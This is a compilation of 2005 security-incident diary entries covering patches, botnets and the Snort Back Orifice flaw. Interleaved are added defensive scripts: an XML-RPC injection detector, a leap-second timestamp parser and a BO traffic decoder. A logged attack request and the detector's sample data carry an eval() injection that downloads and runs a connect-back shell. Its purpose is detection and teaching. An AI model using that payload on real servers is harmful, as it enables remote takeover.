Safemode rootkit & DRM
F-Secure is also covering this in their blog.
PHP and phpBB releases
The first is about the new release of phpBB. This bulletin board system is very common and was the target of some Perl bots some time ago, due to a vulnerability in its code. So it is very important to keep up to date with the vendor's releases.
The second one is PHP itself. They just released version 4.4.1, and I would suggest keeping up to date on this one too...
Today we received a post about some Apache log entries recording attempts to exploit a vulnerability in another PHP component, xmlrpc.php (here the XML-RPC endpoint of a WordPress install). The entry was this one:
POST /wordpress/xmlrpc.php HTTP/1.1
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>
This looks like they were targeting a vulnerability in xmlrpc.php. According to the project's website, the new release fixes some security vulnerabilities: "Note: all users are encouraged to upgrade to release 1.2 or later, since known exploits exist for earlier versions. All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
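The request body above is the whole signal: the parameter text breaks out of the string that the old library fed to eval(), runs a shell command in backticks, and comments out the remainder with /*. The script below is an added example for this page (not code from the diary, from WordPress, or from the XML-RPC for PHP library) that flags such requests by those indicators. The request records and bodies are constructed; RFC 5737 documentation addresses stand in for the masked IPs in the log entry.

```python
"""Flag XML-RPC requests whose parameter text looks like the eval()
injection attempt quoted in the diary entry above.

Added example for this page; not code from the diary, from WordPress,
or from the XML-RPC for PHP library. The records below are constructed.
"""
import re

# Indicators drawn from the captured request body: a "));" that closes the
# string and call inside the vulnerable eval(), backtick command
# substitution, a download-then-chmod-then-run chain, and a trailing "/*"
# that comments out the rest of the generated PHP.
INDICATORS = {
    "call_breakout": re.compile(r"\)\s*\)\s*;"),
    "backtick_exec": re.compile(r"`[^`]+`"),
    "download_chain": re.compile(r"\b(?:wget|curl|fetch)\b[^;`]*;\s*chmod\s+\+x", re.I),
    "php_comment_tail": re.compile(r"/\*\s*$"),
}
FIELD = re.compile(r"<(name|value|string)>(.*?)</\1>", re.S)
TAG = re.compile(r"<[^>]+>")


def xmlrpc_fields(body):
    """Text of each <name>, <value> or <string> element, inner tags stripped.
    A regex is used on purpose: attack bodies are rarely well-formed XML."""
    return [TAG.sub("", text).strip() for _, text in FIELD.findall(body)]


def injection_indicators(text):
    """Names of the indicators that match one field's text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def request_indicators(record):
    """Union of indicator names over every field of one request record."""
    found = set()
    for field in xmlrpc_fields(record["body"]):
        found.update(injection_indicators(field))
    return found


def is_xmlrpc_exploit(record):
    """True for a POST to an xmlrpc.php path carrying at least two indicators."""
    return (record["method"] == "POST"
            and record["path"].endswith("/xmlrpc.php")
            and len(request_indicators(record)) >= 2)


def scan(records):
    """(path, sorted indicator names) for every flagged request."""
    return [(r["path"], sorted(request_indicators(r)))
            for r in records if is_xmlrpc_exploit(r)]


# Constructed samples: the first mirrors the shape of the captured attack,
# the second is an ordinary pingback call.
ATTACK_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>test.method</methodName>'
    "<params><param><value><name>',''));echo '_begin_';echo `cd /tmp;"
    "wget 192.0.2.44/cback;chmod +x cback;./cback 198.51.100.194 8080`;"
    "echo '_end_';exit;/*</name></value></param></params></methodCall>"
)
BENIGN_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName>'
    "<params><param><value><string>http://example.com/2005/10/a-post</string>"
    "</value></param><param><value><string>http://example.net/blog/?p=7</string>"
    "</value></param></params></methodCall>"
)
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/wordpress/xmlrpc.php", "body": ATTACK_BODY},
    {"method": "POST", "path": "/wordpress/xmlrpc.php", "body": BENIGN_BODY},
    {"method": "GET", "path": "/wordpress/index.php", "body": ""},
]

if __name__ == "__main__":
    for path, names in scan(SAMPLE_REQUESTS):
        print(path, names)
```

Requiring two indicators keeps a lone "));" in a legitimate code snippet posted through XML-RPC from firing; the attack above trips all four. Apache's default access log does not record POST bodies, so the records have to come from mod_security, a proxy, or a packet capture, as the diary's entry evidently did.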
Pedro Bueno ( pbueno //%// isc. sans. org)
Leap second: when time stands still
UTC TIME STEP
on the 1st of January 2006
A positive leap second will be introduced at the end of December 2005.
The sequence of dates of the UTC second markers will be:
2005 December 31, 23h 59m 59s
2005 December 31, 23h 59m 60s
2006 January 1, 0h 0m 0s
This is being done to keep civil time (UTC), which follows the slowly decelerating rotation of the Earth, in step with the atomic clocks that define the second. There have been several leap seconds introduced since 1972.
My original source for this information is the November 2005 Scientific American article by Wendy Grossman. The impact on information systems can come from GPS clocks that do not recognize the leap second and send out flawed or inaccurate time, which can affect many time-based functions, including security features. According to the article there is talk within the International Earth Rotation and Reference Systems Service (IERS) of decoupling standard time from the Earth's rotation and adhering strictly to atomic time.
NTP systems appear to be able to handle leap seconds: http://www.eecis.udel.edu/~mills/leap.html
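The place this bites a security tool is timestamp parsing: 23:59:60 is a legal UTC time, yet most date libraries refuse a second of 60, so a log parser or correlation engine can throw away or crash on the one second of the year it cannot represent. The parser below is an added example for this page (not from the diary or from ntpd); it assumes ISO-8601 UTC timestamps, accepts the inserted second only at 23:59 UTC on the last day of a month (the only place IERS may schedule one), maps it onto POSIX time without losing the ordering of events across the boundary, and the log lines are constructed.

```python
"""Parse UTC log timestamps without choking on the 23:59:60 leap second.

Added example for this page, not code from the diary or from ntpd. It
assumes ISO-8601 UTC timestamps such as 2005-12-31T23:59:60Z; the log
lines at the bottom are constructed.
"""
import calendar
import re
from datetime import datetime, timezone

ISO_UTC = re.compile(r"^(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})Z$")


def parse_utc(ts):
    """Return (posix_seconds, is_leap_second).

    datetime() refuses second=60, so the inserted second is handled by hand.
    It is accepted only where IERS may schedule one: 23:59 UTC on the last
    day of a month (in practice only June and December have been used).
    POSIX time has no value for the inserted second, so it is mapped to the
    same number as the following midnight and the flag keeps them apart.
    """
    m = ISO_UTC.match(ts)
    if not m:
        raise ValueError(f"not an ISO-8601 UTC timestamp: {ts!r}")
    y, mo, d, hh, mm, ss = (int(g) for g in m.groups())
    if ss == 60:
        if (hh, mm, d) != (23, 59, calendar.monthrange(y, mo)[1]):
            raise ValueError(f"leap second at an impossible position: {ts!r}")
        end_of_day = datetime(y, mo, d, 23, 59, 59, tzinfo=timezone.utc)
        return int(end_of_day.timestamp()) + 1, True
    stamp = datetime(y, mo, d, hh, mm, ss, tzinfo=timezone.utc)
    return int(stamp.timestamp()), False


def is_valid_timestamp(ts):
    """True if parse_utc() accepts the timestamp."""
    try:
        parse_utc(ts)
        return True
    except ValueError:
        return False


def sort_key(ts):
    """Order key that keeps 23:59:59 < 23:59:60 < 00:00:00."""
    posix, leap = parse_utc(ts)
    return (posix, 0 if leap else 1)


def order_log(lines):
    """Stable chronological sort of 'TIMESTAMP message' lines."""
    return sorted(lines, key=lambda line: sort_key(line.split(" ", 1)[0]))


# Constructed log lines, deliberately out of order.
SAMPLE_LOG = [
    "2006-01-01T00:00:00Z sshd: accepted publickey for ops from 192.0.2.10",
    "2005-12-31T23:59:60Z kernel: inserting leap second",
    "2005-12-31T23:59:59Z firewall: dropped 198.51.100.7 -> tcp/3372",
]

if __name__ == "__main__":
    for line in order_log(SAMPLE_LOG):
        print(line)
```

The leap second and the following midnight share the POSIX value 1136073600; only the flag distinguishes them, which is why sort_key() is used rather than the raw epoch. A parser that used datetime.strptime() directly would raise on the second sample line and a naive tool would lose that event entirely.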
Scientific American article here.
Happy travels through time ...
Dan at madjic dot net
(Another) AOL Pwstealer
Just a quick note about (another) password stealer that we received today, focused on AOL. This one is not detected by any AV on VirusTotal yet, although after I sent it to my personal AV contact list, some already answered that it will be included in the next signature release.
This one had the name new_pict.exe, maybe trying to fool the person into clicking on an attachment.
If you run this file you will get this screen asking for a screen name and password.
Pedro Bueno ( pbueno //%// isc. sans. org)
Email From Beyond - Tell us your own Halloween stories
I had known him for about 10 years when he died, too young, too soon. He was the President of our local School Board, I was the Vice President. We worked closely together on all of the topics and issues that face a School Board over the years. Even through the times when the cancer made it difficult for him to go on. He was that kind of man.
His name was John, and he was more than just my colleague... he was my friend.
He was also what I would call a computer nerd wannabe. He loved genealogy and created incredibly detailed databases of his own design. He was a sucker for the latest and greatest technology gizmos, and always had newer and cooler toys than me. But when things got beyond the world of his pre-packaged software, he was out of his depth. That's when I'd get a call.
I pulled more than a few viruses off of his machine, always leaving him with a gentle reminder about safe computer practices. But I could never get frustrated with him. The differences in our ages placed him squarely in the generation before me, and getting angry at him would be like getting angry at my dad... something that I just could never do.
The day that he died, I was both honored and terrified when his wife and daughter asked me to speak at his funeral. What would I say? How could I possibly sum up a life?
The funeral was to be in three days, and for two of those days I spent my time gathering facts about his life: his years of service at his job, his family history, his years on the School Board. On the night before the funeral, I sat down at my laptop and stared at a blank Word document, trying to decide where to begin.
I wrote. I wrote for about two hours, putting down a listing of accomplishments, accolades, and achievements. With each new item that I listed, a weight seemed to press down on me, more and more. It just wasn't right.
Then, as I sat there looking at what I had written, the sound of a chime indicated that I had received a new email message. I switched over to my email program and was incredibly startled to see that I had received an email message from, of all people, John.
The subject line read: "Thank you"
I flipped back over to Word, and opened a new document. In about twenty minutes, I'd written a new eulogy with a very simple subject: "Thank you." Thank you for all that you were. Thank you for the difference you made. Thank you for being you.
Although I never actually opened the email, I didn't need to look into the situation too closely to know what had happened. One of the subject lines used by Netsky when it forged virus-laden email messages was "Thank you."
I still have that message, unopened, at the bottom of my in-box.
DST Cisco Surprise
Don's Halloween Trick
SANS offering TREATS too.
Survey: Information Security Career Advancement Survey now available.
Complete the survey by November 10 to receive a copy of the results.
Sweet Treats from the Honeynet group.
release of mwcollect v3.0.0 on http://www.mwcollect.org/ .
Mwcollect is a distributed malware collector network. A mwcollect network is composed of one or more mwcollectd sensors, an optional database to store collected binaries, and optional redirect servers that send specific ports towards the mwcollectd sensors. Mwcollectd sensors simulate vulnerable services to spreading malware, which then tries to exploit those services. The mwcollectd daemon parses the exploit packets, searches them for the shellcode, interprets the shellcode, and then takes further actions to download the malware. The malware can then be submitted into a database or stored on the local filesystem. The redirect servers act as NATted gateways to forward specific ports to the mwcollectd servers. This provides greater IP address space coverage with fewer full-blown mwcollectd servers.
The core has been completely rewritten. It is now even more modularized and has proven to be very stable. Integration of libCURL for http/ftp downloads is now threaded and therefore does not result in increased CPU usage. Mwcollect v3.0.0 is much more suited for future extensions and is the important step from the proof of concept that v2.x.x was to a real mature product. Mwcollect is now licensed under the GPL, (c) by
You can download a compressed .tar.bz2 source package from
Microsoft attacks Zombie Masters.
Microsoft said it has filed "John Doe" lawsuits against the operators of 13 spam organizations that use illegal "zombie" computers to send their spam. The company held a press conference today with officials from the Federal Trade Commission to announce the lawsuits, filed in Washington State's King County court on August 17.
From an interview with Tim Cranton http://spamkings.oreilly.com/cranton.mp3
Microsoft has taken a new approach to security, in particular on the enforcement side. They took a clean computer and infected it with a common piece of malicious code. That code turned the computer into a spam zombie: a computer connected to the Internet that has been infected and checks in with the zombie controllers to let them tell it what to do. Microsoft documented 5 million connections used to send over 18 million spam messages in less than 3 weeks. This was just one computer, and there are reported to be thousands of spam zombies out there. Microsoft cordoned its spam zombie off the net so it could not actually be used to send the spam. Microsoft filed a lawsuit and contacted ISPs to try to discover who is really sending the spam.
The SANS news bites letter has additional information on this.
Reminder: Daylight Saving Time Ends Sunday At 02:00
Incident Handling: Home Heating 101
Several days ago it finally got cold enough in Virginia to require using the furnace to heat the house so we flipped the switch on the thermostat from Cool to Heat. The furnace worked fine and we had whole-house heat for a couple of days. Two days ago I came home and the house was cold. I checked the circuit breaker in the electric panel and it wasn't tripped. I checked the light in the utility room (same circuit as the furnace) and it wouldn't come on. Changed the light bulb -- no joy. Flipped the circuit breaker off and back on -- no joy. I went back upstairs to think of other ideas to try before calling an HVAC contractor when all of a sudden, a few minutes later the furnace turned on and started working just fine.
The furnace ran that evening and into the night but sometime early in the morning, it stopped working again. I called an electrician and got someone to come out and take a look at it that afternoon. He started with the furnace. It seemed ok. Tested the new light bulb -- it was good. Tested the light socket and was surprised to get a voltage reading on the neutral wire.
So he went to the main electric panel for the house, removed the panel cover to expose the wiring connections to the circuit breakers and neutral bars and found quite a surprise. Instead of one neutral wire for each circuit being secured by one lockdown screw on the neutral bar, there were a number of instances of two or three wires under one screw. In the case of the furnace circuit, there were four wires under one screw. The screws were loose so the wires had been intermittently shorting and sparking. Had lots of nice black soot from the arcing in there. He was really "shocked" at the condition of the wiring in there -- no way it could have passed an inspection as it was. He rewired the box correctly and the furnace works fine now.
So in this incident, it appeared that the problem was with the furnace since the air handler had been working fine for months cooling air and just shortly after starting to use the furnace for heat was when we had problems. But it turned out to be an external component (the electrical circuit) that the furnace depended on.
How does this relate to information security? Well, similar incidents occur. If we get alerted that a system on our network has been compromised, our attention is usually directed first to the compromised system, and then perhaps to the firewall to ensure we are only allowing the appropriate access. But we may need to look elsewhere on our network to find the cause of the problem, or the access vector that is open. Perhaps someone has added a wireless access point or has a dial-in modem attached to a workstation. Oftentimes we need to look beyond the immediate likely cause to find the actual cause.
Have a safe weekend and Happy Halloween Monday night. It looks like it's supposed to be dry and cold here so I'm glad my furnace works now.
Botnet Malware code modifier's competition continues
"HellBot3 have BackDoor in 'HellMsn.h'. The HellBot3 author is an idiot!!!
Play with The best, Die like the rest."
Sheesh, upon reflection, the strings above make me miss Gobbles, whose flames rank right up there as all-time classics.
"It may be possible to make Ethereal crash, use up available memory, or run arbitrary code by injecting a purposefully malformed packet onto the wire or by convincing someone to read a malformed packet trace file."
The IDefense advisory is at: www.idefense.com/application/poi/display?id=323&type=vulnerabilities
There is exploit code for at least one of the BOF vulns. Now, who uses Ethereal, anyway? Net admins, incident handlers, auditors, analysts....nothing important to worry about on their systems, eh?
A great way to avoid getting bitten badly by these protocol parser attacks is to not run them as the superuser if you don't have to. Do your packet capturing with something dumb (like tethereal or tcpdump with the -w switch), then analyze the capture file as a non-privileged user. This way an attacker is limited in the damage that can be done, should they slide the evil bits into your sniffer.
Escaping the P2P-induced alert onslaught
Defeating A/V by inserting forged data
An Assessment of the Oracle Password Hashing Algorithm
The authors' findings indicate that the password hashing algorithm is weak and subject to a number of attacks. If an attacker is able to obtain Oracle password hashes from a compromised system, through traffic sniffing, SQL injection or other attack vectors, they will likely be able to recover plaintext passwords with few resources, even when strong passwords are selected. The paper also recommends several actions Oracle DBAs can take to help mitigate this threat.
The SANS Institute contacted the Oracle product security team about these findings on 7/12/2005. Subsequent requests for clarification on what Oracle plans to do to address these vulnerabilities have gone unanswered. Oracle customers are encouraged to communicate their desire to resolve these vulnerabilities through the appropriate channels.
New Skype vulnerabilities
CVE entries: CVE-2005-3265
Secunia advisory: http://secunia.com/advisories/17305/
Please upgrade to the new version ASAP, they have been rated highly critical by Secunia, and high by Skype.
Download here: http://www.skype.com/download/
Adrien de Beaupre
Exploit for Snort BO available!
Our good reader Juha-Matti sent a note about an exploit published by FrSIRT, formerly known as K-Otik.
On the good side, our Handler Kyle Haugsness created a tool and some snort signatures that can detect them!
I just tested it against the exploit and it really works! ;-) You can find it here .
If you haven't patched yet or applied the workarounds, do you need more reasons?
Is hurricane Wilma affecting you?
We've recently received an additional report that mentioned "I've not been able to reach any of my sites hosted there since about 0830 EDT. " Thanks Fred!
UDP traffic to port 50368
Here is a quick sample of sources and source ports:
No idea what's causing that. We have almost no other traffic to this port in our database. If you see any outbound traffic like that, let us know.
deja vu - "25 new unpackers added in one week"
Yup, that's 25 new unpackers in one week, and there's other "deja vu" data at Kaspersky.
And Websense published a whitepaper of the "JS/Wonka" encoding technique.
A new botnet - Mocbot
This botnet client has been spread using the MS05-047 vulnerability, their entry continues.
McAfee has information at:
This is a heads up for some since botnet owners are using it to further exploit networks they already have a presence on. If you haven't already patched - you may want to do so now.
Update: McAfee and F-Secure have since amended their write-ups; this botnet exploits MS05-039, not MS05-047.
Stopping Spam by Extrusion Detection
This is an excellent article by Richard Clayton, University of Cambridge in the UK. I am very intrigued by the information that was supplied in this article. Richard has provided some very helpful tips. Thanks Chris for bringing this to our attention.
Exploit circulating for newly patched Oracle bug
Those of you who use Oracle may want to take a look at the article and consider getting your systems patched.
Possible Problem with MS05-050 Patch
According to Microsoft, this only applies if:
• You are running Microsoft Windows 2000
• Microsoft DirectX 8.0 or DirectX 9.0 is installed on the computer
This is likely caused by manually downloading and installing the wrong package. If you installed through the Microsoft Windows Update website, you should be protected and free from this problem.
To check whether your system is correctly updated, you can verify the version number of Quartz.dll. The steps are detailed in Microsoft KB article 909596.
Exploit Code for MS05-047
Snort signature and standalone detection tool
Here's the Snort signature. Don't forget to turn off the BO pre-processor in snort.conf if you are running a vulnerable version! Also, don't forget to change the "sid" field below...
alert udp any !31337 <> any !31337 ( \
msg: "BLEEDING-EDGE EXPLOIT Snort Back Orifice pre-processor buffer overflow attempt"; \
dsize: >1024; \
content:"|ce 63 d1 d2 16 e7 13 cf|"; \
offset: 0; \
depth: 8; \
threshold: type limit, track by_dst, count 1, seconds 60; \
classtype: attempted-admin; \
sid: 3000001; )
Outage on Verio and Level3
Big Honkin' Botnet - 1.5 Million!
"The botnet in the spotlight by the Dutch National Criminal Investigation unit in the Netherlands, about two weeks ago was found to comprise approximately 1.5 million hacked computers (instead of 100k reported earlier). This has been discovered by GovCert.nl, the Dutch Computer Emergency Response Team, while dismantling the network of computers infected with a Trojan Horse. Of the total number of infected computers, it was estimated that only 30,000 were located in the Netherlands.
The court of Breda has decided to keep the 19-year old suspect as well as a companion, in custody. This companion is suspected of being responsible for a so-called Denial of Service (DoS) attack after an extortion attempt of a US-based company. Earlier on in the investigation both of them were suspected of being involved in another DoS attack of a US based company.
More arrests related to this investigation are anticipated."
Woohoo! Bad guys in jail. You gotta love that.
From a trend perspective, I've been noting two things, which I've also heard fellow handler that I call Ekim Roop mention. We're seeing some smaller botnets, which are more highly differentiated (that is, a single bad guy might have three or four botnets, each doing one element of a given crime. One set of bots for spamming, another for a distributed web site for phishing, and another to obscure surfing through proxying.) At the same time, we're also seeing some very vast botnets, this time over a million. We may even go higher than that in the future.
Scary stuff. Keep fighting the good fight, dear readers. We must.
Over and out--
Sploits Du Jour: Veritas NetBackup & Ethereal. Watch Oracle and Snort!
In particular, patch Veritas NetBackup (more info here). Working exploits have been released.
Also, patch Ethereal (more info here). Again, working exploits are available.
Also, as we said the other day, don't forget to check out the crucial Oracle patches.
And, for goodness sakes, patch Snort or shut off the Back Orifice preprocessor! A fully working exploit is likely very near.
Also, a kind reader emphasized the importance of hardening systems today, in light of this Snort vulnerability, mentioning the great Grsecurity package for Linux, as well as the importance of chroot environments. Also, this reader requesting anonymity points out that the Stack-Smash-Protector (SSP) extensions for gcc from IBM make it harder to exploit buffer overflows, and can be compiled into various executables. It's essentially an update of the venerable StackGuard tool, but more carefully integrated with the compiler itself. As we say in Jersey... "Noice".
Fraud: Evil People Doing Evil Things
Back to Green on the Snort BO Buffer Overflow
Snort BO status update
When this vulnerability was announced yesterday, I was curious to see how difficult this would be to exploit due to the widespread nature of Snort. After doing a little research on the encryption method in Back Orifice, I was able to develop working exploit code in 2 hours. Bad news!! Of course, we aren't in the business of releasing exploits, so this code is staying private. Now, it appears that HD Moore is very close to having exploit code working as a plugin to Metasploit. If we haven't said it loudly enough already, PLEASE UPGRADE your Snort sensors or disable the BO pre-processor if running the vulnerable versions of the Snort 2.4 series. I checked the 2.3.2 source tree today and it is not vulnerable.
How about defensive measures? If you are running Snort and are able to upgrade, then the new version should detect the exploit attempt. But I am working on two additional defensive tools. The first is a Snort signature that should catch the exploit attempt. This should be available real soon now (tm).
The second tool may prove to be much more valuable. This tool is necessary because of the fact that the exploit can be triggered on any UDP port (except 31337) and that all Back Orifice traffic is encrypted. I don't want to give away more information at this point, since it will help the exploit writers. The tool is a standalone program that utilizes libpcap to sniff traffic and decode UDP traffic looking for the exploit. It will be useful to folks that can't upgrade their Snort daemon to get the new detection it provides, but still want to see if they are being attacked. Secondly, this will be useful to people running a different IDS system that can't decode the Back Orifice encryption. Third, it will probably be very useful in identifying a global worm outbreak.
Since time is of the essence here, I am hoping to have this tool available very shortly. It will require libpcap and is being developed on Debian Linux. It will not require Snort to be running. Since code portability isn't my strong suit, we may be looking for people to test and port the code to FreeBSD, Solaris, etc. Please drop us an e-mail if you would be willing to help in this area. The source code is currently about 800 lines.
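The eight content bytes in the Snort signature above and the standalone decoder described here rest on the same fact: Back Orifice "encryption" is a keyed XOR, and the default key is 31337. The script below is an added example for this page, not Kyle's tool and not Snort's code. It assumes that the keystream is the low byte of successive outputs of the Microsoft CRT rand() generator (x = x * 214013 + 2531011 mod 2^32, output (x >> 16) & 0x7fff) seeded with the 16-bit key, that every BO datagram opens with the magic "*!*QWTY?", and that the 1024-byte dsize threshold of the published rule marks the overflow boundary. The packets it builds are constructed filler with no exploit payload; in use, feed it the UDP payload of each captured datagram, whatever the port.

```python
"""Decode Back Orifice UDP payloads and flag the oversized ones that target
the Snort 2.4 'bo' preprocessor overflow.

Added example for this page: neither Kyle's tool nor Snort code. Assumes
BO XORs each packet with the low byte of successive Microsoft CRT rand()
outputs seeded with a 16-bit key (default 31337), that packets start with
the magic "*!*QWTY?", and that the 1024-byte threshold from the published
rule's dsize test marks the overflow. Test packets below are constructed.
"""
BO_MAGIC = b"*!*QWTY?"
BO_DEFAULT_KEY = 31337
OVERFLOW_THRESHOLD = 1024  # bytes; mirrors the rule's "dsize: >1024"
KEY_SPACE = 1 << 16        # BO keys are 16-bit values


def bo_keystream(key, length):
    """Keystream bytes for a key: low byte of each rand() output."""
    state = key & 0xFFFFFFFF
    out = bytearray()
    for _ in range(length):
        state = (state * 214013 + 2531011) & 0xFFFFFFFF
        out.append((state >> 16) & 0xFF)
    return bytes(out)


def bo_crypt(data, key):
    """XOR with the keystream; encryption and decryption are the same op."""
    return bytes(b ^ k for b, k in zip(data, bo_keystream(key, len(data))))


def find_bo_key(payload):
    """Brute-force the 16-bit key space; return the key under which the first
    eight bytes decrypt to the BO magic, or None if no key does. Almost every
    candidate is rejected on its first byte, so this is cheap per packet."""
    if len(payload) < len(BO_MAGIC):
        return None
    head = payload[:len(BO_MAGIC)]
    for key in range(KEY_SPACE):
        state = key
        for want, have in zip(BO_MAGIC, head):
            state = (state * 214013 + 2531011) & 0xFFFFFFFF
            if have ^ ((state >> 16) & 0xFF) != want:
                break
        else:
            return key
    return None


def classify_udp_payload(payload):
    """('not-bo', None), ('bo-traffic', key) or ('bo-overflow-attempt', key).
    Port numbers are deliberately ignored: the preprocessor looks at every
    UDP packet, so the exploit can arrive on any port."""
    key = find_bo_key(payload)
    if key is None:
        return ("not-bo", None)
    if len(payload) > OVERFLOW_THRESHOLD:
        return ("bo-overflow-attempt", key)
    return ("bo-traffic", key)


def build_bo_packet(body, key=BO_DEFAULT_KEY):
    """Constructed test traffic: magic plus arbitrary filler, encrypted."""
    return bo_crypt(BO_MAGIC + body, key)


if __name__ == "__main__":
    # Encrypting the magic with the default key reproduces the rule's content.
    print(bo_crypt(BO_MAGIC, BO_DEFAULT_KEY).hex())
    print(classify_udp_payload(build_bo_packet(b"A" * 1100)))
    print(classify_udp_payload(build_bo_packet(b"ping", key=4242)))
```

The published rule only matches datagrams encrypted with the default key; the brute-force in find_bo_key() is what a standalone tool needs to see BO traffic (and the exploit) under a non-default key, which a sensor running a different IDS cannot decode at all. Running bo_crypt() on the magic with key 31337 yields exactly the eight bytes the rule carries, which is a useful sanity check that the generator above is the right one.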
Oracle Critical Patch Update and Security Alert
Oracle released a Critical Patch Update in October 2005 which addresses more than eighty vulnerabilities in different Oracle products and components. The impacts of these vulnerabilities include unauthenticated remote code execution, information disclosure, and denial of service.
Infocon Yellow: Snort BO Vulnerability
You have a problem if you run Snort version 2.4 (other than 2.4.3) and have the 'bo' preprocessor enabled.
Why do we think this is a big deal:
- The exploit is rather easy to write. Yes, it's specific to a particular binary, but there are a number of common binaries deployed in large numbers.
- It uses a single UDP packet, which can lead to very fast spreading worms.
- The UDP packet can be spoofed, and can use any port combination.
- Snort is very popular. A fast spreading (noisy) UDP worm could lead to local slowdowns/outages.
Snort before version 2.4 is not vulnerable. Neither is any Snort install that does not have the bo preprocessor enabled.
Please let us know if you see exploits posted, or have other details to share. We expect to stay on 'yellow' for about 12-24 hrs unless there are any new developments.
Snort BO pre-processor Vulnerability
As an immediate step, disable the BO preprocessor, by commenting out this line:
# preprocessor bo
This should eliminate the issue, and these days Back Orifice is not all that much of a threat compared to other trojans/bots. You should also consider upgrading to Snort 2.4.3, which fixes the issue.
MS05-051 exploit spotted
Trend Micro states that the malware was written in Visual Basic, which usually indicates some low-skilled bot-kid. Kind of odd to see it surface this way, but having it included as a new warhead in existing malware matches past patterns.
We will update this diary as we learn more.
GPL Nessus Forks
In case you have missed the announcement, Tenable Security has decided to commercialize the popular Nessus security scanner within the next month.
As a result, a project group has been formed to release a GPL fork of the Nessus security scanner in the future. This product will probably undergo a name change to prevent problems with support between the commercial scanner and the new GPL fork. In the meantime, it is located at http://www.gnessus.org/doku.php .
Additionally, Handler Kevin Liston noted that another GPL nessus project is located at http://porz-wahn.berlios.de/homepage/about.php .
Entertaining Bug in Microsoft Word
For those thinking "Where is the security implication of this?", take this as an editorial on software complexity and its connection to security flaws. As software has become more complex, we have seen more and more security flaws found. Simple enough, right? To restate it a little differently, software complexity and flaws detected are directly related. This may not always stay the case, but that is common wisdom in today's world. (Side note: This is not a gripe against Microsoft and should not be read in that light. This is just as relevant to any software vendor.)
In this increasingly complex software, how many flaws are there which have remained undetected for years? How many very simple oversights, like the one above, exist in more sensitive modules with security ramifications? How long can a minor flaw stay undetected in popular software packages?
To me, this is a very sobering thought, especially considering the number of e-commerce or medical sites on the Internet today. Somehow, I will not let it make me lose sleep over the (in)security of my private information on the Internet.
For those that have a large amount of copious spare time, feel free to send in other single-word examples of the above to our attention. Hyphenated words are troublesome to native speakers, much less computers. If you find any words, please also submit what version of Word exhibited this issue. We will try to find an appropriate contact within Microsoft to send the examples to.
Pedro's Malware Analysis Quiz
Possible Patch Problems
A number of people have reported weird problems with one of the MS patches released yesterday, specifically MS05-051 Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400).
Symptoms include, but are not limited to:
- Inability to visit Windows Update
- Inability to use the Search tool off the Start Menu
- blank screen (no icons) upon login
- Symantec LiveUpdate stops working
- SpySweeper stops working
- problems with Office apps
- VirtualPC becomes extremely sluggish
Lee said he had spoken to a Microsoft engineer about this. From what he could tell:
"this issue is only affecting people with very specific NTFS permissions. If the C:\Winnt\Registration folder is locked down and cannot be written to by COM+ you will have errors similar to those listed in your alert. All of those tasks use COM+ in one way or another."
Another perspective from Microsoft:
'The solution will be available at http://support.microsoft.com/?id=909444,
and will be linked to from the MS05-051 bulletin - hopefully within the
hour. Feel free to communicate the cacls solution to anyone you come across
until then. This is not a "known issue" or "problem" with the patch, but a
"complexity with the increased security provided by the patch when running
on systems where settings have been incorrectly changed from the default
Uninstalling patch 902400 seems to do the trick for most folks. You may need to check the "Show Updates" box under Add/Remove Programs to see the hotfixes. The better answer is calling Microsoft directly; this should be a free call if the issue is problems with a patch. The US number is 866-727-2338. Outside of the US, see http://support.microsoft.com/common/international.aspx?rdpath=4 .
Now this week started in a very similar way, with a large number of Microsoft patches. In particular the MSDTC vulnerability (MS05-051) has a lot of promise. Like the PnP vulnerability used by Zotob, it could target Win2k quite efficiently. At this point, the only thing missing is a widely available exploit, but given that there are a number of private/commercial exploits, a public one is probably right around the corner.
So what should you do today before you head home for the weekend:
The obvious thing is to apply patch MS05-051 on at least your Win2k systems. We do know that port 3372 scanning started in full force, likely in order to acquire target lists. If you can't patch, at least make sure port 3372 is blocked. Windows 2000 does not come with its own host-based firewall, but you can use IPsec policies to achieve the same effect. See this paper by David Taylor for details.
What will happen this weekend? I invited other handlers to add their own opinions/predictions to this story. In my opinion, we will not see widespread exploits. This can change quickly, but is also dangerous in its own way: Zotob showed very nicely how an exploit will not get much attention until it hits a couple of high-profile targets. The scenario I am most afraid of is the use of an exploit by a small group to attack high-value targets. Remember the "Russian key logger" episode (Berbew)? A group exploited a number of well-known web sites using the IIS SSL vulnerability, and came back months later to plant an Internet Explorer exploit. We are "ripe" for a repeat of this scenario, given the rich selection of client exploits released recently.
What should you do this weekend? Stay close to your pager. In particular, don't consider yourself safe just because CNN isn't reporting about it. Make sure your IDS is set up with MS05-051 signatures, and see if you can just log all port 3372 traffic. Use the rest of today to collect some data so you have a baseline if things turn bad. I don't like to recommend turning systems off, but well, there is nothing more secure than a system disconnected from power.
Please use our forum to share your own opinions and predictions.
FrSIRT exploits for MS05-044, MS05-045, and MS05-048
Microsoft Collaboration Data Objects Buffer Overflow PoC Exploit (MS05-048)
Microsoft Windows Network Connection Manager Local DoS Exploit (MS05-045)
Microsoft Windows FTP Client File Location Tampering Exploit (MS05-044)
Many thanks to John Otterson and Eric Griswold for noticing this.
Increased activity on TCP port 5250
If you have captures of any of this traffic, please upload them via the contact page. Thanks in advance.
MS05-044 Folder View for FTP Sites - mailbag item
Well, Microsoft makes "Folder View for FTP Sites" a complex subject and certainly one I may be able to post "Workaround" information on in a Diary post.
AFAICT there are many variables involved in OS and IE "installation" (OEM settings, etc.) that can affect FTP Folder views. I did read a ton of MS KBs and the two best on the specific issue are referenced below. And I really appreciate your polite persistence in pushing me to read up on this important item. Thank you!
You're right that MS is misleading in its Security Bulletin presentation. Because so many factors like OEM and customer installation settings can enable the FTP folder view, the Security Bulletin should state a clear workaround on how to look for it in the IE Advanced tab and clearly state that you can disable it by unchecking/clearing it.
In the bulletin, in the "Mitigating Factors for FTP Client Vulnerability - CAN-2005-2126:" section MS says;
